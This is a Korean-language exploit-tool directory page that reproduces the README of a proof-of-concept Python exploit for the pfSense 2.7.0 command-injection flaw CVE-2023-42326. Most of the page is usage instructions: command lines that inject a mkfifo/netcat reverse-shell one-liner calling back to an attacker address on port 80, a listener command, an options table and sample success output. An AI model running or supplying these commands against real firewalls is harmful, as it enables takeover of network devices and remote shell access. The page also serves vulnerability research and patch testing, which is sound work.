Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2023-42326 — 이는 pfsense 2.7 명령어 주입 취약점 ( CVE-2023-42326)을 보여주기 위한 간단한 POC입니다. | Kitploit
도구/GitHubGitHub/bl4ckarch/cve-2023-42326
Payload GenerationVulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingCommand and Control
GitHubbl4ckarch/cve-2023-42326

CVE-2023-42326

이는 pfsense 2.7 명령어 주입 취약점 ( CVE-2023-42326)을 보여주기 위한 간단한 POC입니다.

저장소 보기
41년 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

pfSense 2.7.0 명령 삽입 익스플로잇 (CVE-2023-42326)

이 Python 스크립트는 pfSense 2.7.0의 명령 삽입 취약점(CVE-2023-42326)에 대한 개념 증명(PoC) 익스플로잇입니다. 이 취약점을 통해 인증된 공격자는 interfaces_gif_edit.php 및 interfaces_gre_edit.php 구성 요소를 통해 임의 명령을 삽입하고 실행할 수 있습니다.

기능

  • 익스플로잇 모드 선택 (gif 또는 gre)으로 취약한 구성 요소 선택.
  • 임의 셸 명령을 실행할 수 있는 명령 삽입 기능.
  • 자동 스레드 관리를 포함한 Netcat 리버스 셸 처리.
  • 요청 데이터 가시성을 높이는 디버그 모드.

사전 요구사항

스크립트를 실행하기 전에 다음이 준비되어 있어야 합니다:

  • 시스템에 Python 3.x 설치.
  • 필요한 Python 라이브러리 설치:
    root@kitploit:~
    pip install requests beautifulsoup4 rich
    

사용법

기본 예제 (명령 삽입)

이 명령은 사용자 시스템으로 리버스 셸을 생성하는 셸 명령을 삽입합니다:

root@kitploit:~
python3 exploit.py -u "admin" -p "pfsense" --mode "gif" -t "http://10.101.1.1" -c "rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | nc 192.168.151.1 80 > /tmp/f &"
  • -u: pfSense 관리자 로그인 사용자 이름.
  • -p: pfSense 관리자 로그인 비밀번호.
  • --mode: 익스플로잇 모드 (gif 또는 gre).
  • -t: pfSense 대상 URL.
  • -c: 삽입할 셸 명령.
  • -d: (선택 사항) 디버그 모드를 활성화하여 원시 응답 데이터를 확인합니다.

리버스 셸 예제

사용자 시스템에서 Netcat 리스너가 실행 중인지 확인하십시오:

root@kitploit:~
nc -lvnp 80

그런 다음, 다음과 같은 리버스 셸 명령으로 스크립트를 실행하십시오:

root@kitploit:~
python3 exploit.py -u "admin" -p "pfsense" --mode "gif" -t "http://10.101.1.1" -c "rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | nc 192.168.151.1 80 > /tmp/f &"  --insecure(유효한 SSL이 없는 https의 경우)

데모 GIF

  1. pfSense에 로그인하고 GIF 인터페이스 익스플로잇

    데모 1 - GIF 인터페이스

  2. 리버스 셸 실행

    데모 2 - 리버스 셸

스크립트 옵션

예제 출력

익스플로잇이 성공적으로 실행되면 다음과 유사한 출력이 표시됩니다:

root@kitploit:~
██████╗ ███████╗██████╗ ██╗    ██╗███╗   ██╗███╗   ███╗███████╗
██╔══██╗██╔════╝██╔══██╗██║    ██║████╗  ██║████╗ ████║██╔════╝
██████╔╝█████╗  ██████╔╝██║ █╗ ██║██╔██╗ ██║██╔████╔██║█████╗  
██╔═══╝ ██╔══╝  ██╔═══╝ ██║███╗██║██║╚██╗██║██║╚██╔╝██║██╔══╝  
██║     ██║     ██║     ╚███╔███╔╝██║ ╚████║██║ ╚═╝ ██║███████╗
╚═╝     ╚═╝     ╚═╝      ╚══╝╚══╝ ╚═╝  ╚═══╝╚═╝     ╚═╝╚══════╝

Done with ❤️  by @bl4ckarch                                                            
[2024-10-24 03:57:59] [SUCCESS] Target http://10.101.1.1 is reachable
[2024-10-24 03:57:59] [INFO] Fetching CSRF token from: http://10.101.1.1/
[2024-10-24 03:57:59] [SUCCESS] CSRF token extracted successfully
[2024-10-24 03:57:59] [INFO] Sending GIF exploit request to http://10.101.1.1/interfaces_gif_edit.php
[2024-10-24 03:57:59] [SUCCESS] GIF Exploit sent successfully

참고 사항

  • 권한 요구사항: pfSense 인스턴스에 대한 유효한 관리자 자격 증명이 필요합니다.
  • 대상 시스템: 이 익스플로잇은 pfSense 2.7.0에만 해당됩니다.
  • 리버스 셸: 리버스 셸을 설정할 때 방화벽 설정이 지정된 포트의 인바운드 연결을 허용하는지 확인하십시오.

디버그 모드

전송 중인 요청에 대한 자세한 내용을 확인하려면 명령에 -d를 추가하여 디버그 모드를 활성화할 수 있습니다. 그러면 응답 데이터가 출력되고 문제 해결에 도움이 됩니다.

root@kitploit:~
python3 exploit.py -u "admin" -p 'pfsense' --mode 'gif' -t http://10.101.1.1 -c "your_command_here" -d --insecure(유효한 SSL이 없는 https의 경우)

문제 해결

  • 대상 시스템에 연결할 수 있는지 확인하십시오.
  • 로그인에 사용되는 자격 증명을 다시 확인하십시오.
  • 필요한 경우 -d 플래그를 사용하여 더 자세한 로깅을 활성화하십시오.
도구 다운로드
인수설명
-upfSense 관리자 로그인 사용자 이름.
-ppfSense 관리자 로그인 비밀번호.
-t대상 pfSense URL/IP 주소 (예: http://10.101.1.1).
--mode익스플로잇 모드: gif (interfaces_gif_edit.php용) 또는 gre.
-c취약한 구성 요소에 삽입할 명령.
-d선택 사항. 디버그 모드를 활성화하여 응답 데이터를 출력합니다.